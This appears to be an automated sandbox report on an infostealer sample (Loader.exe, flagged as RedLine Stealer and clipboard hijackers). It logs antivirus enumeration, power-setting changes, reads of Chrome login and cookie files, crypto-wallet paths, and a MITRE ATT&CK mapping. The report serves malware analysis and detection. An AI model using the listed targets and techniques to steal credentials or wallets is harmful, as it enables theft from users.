Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Users\user\Desktop\Loader.exe

Code function: 0_2_00AE9A85 cpuid

0_2_00AE9A85

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Code function: 0_2_00AE970E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00AE970E

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.Loader.exe.ae0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Loader.exe.a90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Loader.exe.b14780.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.256139180.0000000000A92000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Loader.exe PID: 5244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 100012, type: MEMORYSTR

Yara detected Laplas Clipper

Source: Yara match	File source: Process Memory Space: ofg.exe PID: 3628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svcupdater.exe PID: 1048, type: MEMORYSTR

Yara detected MicroClip

Source: Yara match

File source: Process Memory Space: svcupdater.exe PID: 1048, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumE#
Source: AppLaunch.exe, 00000002.00000002.423897208.00000000074F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Bl5C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: AppLaunch.exe, 00000002.00000002.423047564.00000000074B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne\|JaxxxLiberty
Source: AppLaunch.exe, 00000002.00000002.423897208.00000000074F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: AppLaunch.exe, 00000002.00000002.423897208.00000000074F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum\wallets
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusE#
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: EthereumE#
Source: AppLaunch.exe, 00000002.00000002.423897208.00000000074F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Bl9C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: powershell.exe, 00000016.00000002.557763116.0000000005E44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\			Jump to behavior

Source: Yara match	File source: 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.423897208.00000000074F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 100012, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.Loader.exe.ae0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Loader.exe.a90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Loader.exe.b14780.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.256139180.0000000000A92000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Loader.exe PID: 5244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 100012, type: MEMORYSTR

Yara detected MicroClip

Source: Yara match

File source: Process Memory Space: svcupdater.exe PID: 1048, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	21 Command and Scripting Interpreter	1 Windows Service	1 Windows Service	21 Deobfuscate/Decode Files or Information	1 Credential API Hooking	2 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	612 Process Injection	31 Obfuscated Files or Information	Security Account Manager	144 System Information Discovery	SMB/Windows Admin Shares	1 Credential API Hooking	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 Service Execution	Logon Script (Mac)	11 Scheduled Task/Job	1 Software Packing	NTDS	351 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	1 PowerShell	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	12 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 File Deletion	Cached Domain Credentials	241 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	4 Rootkit	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	112 Masquerading	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	2 Modify Registry	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	241 Virtualization/Sandbox Evasion	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	612 Process Injection	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	1 Hidden Files and Directories	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
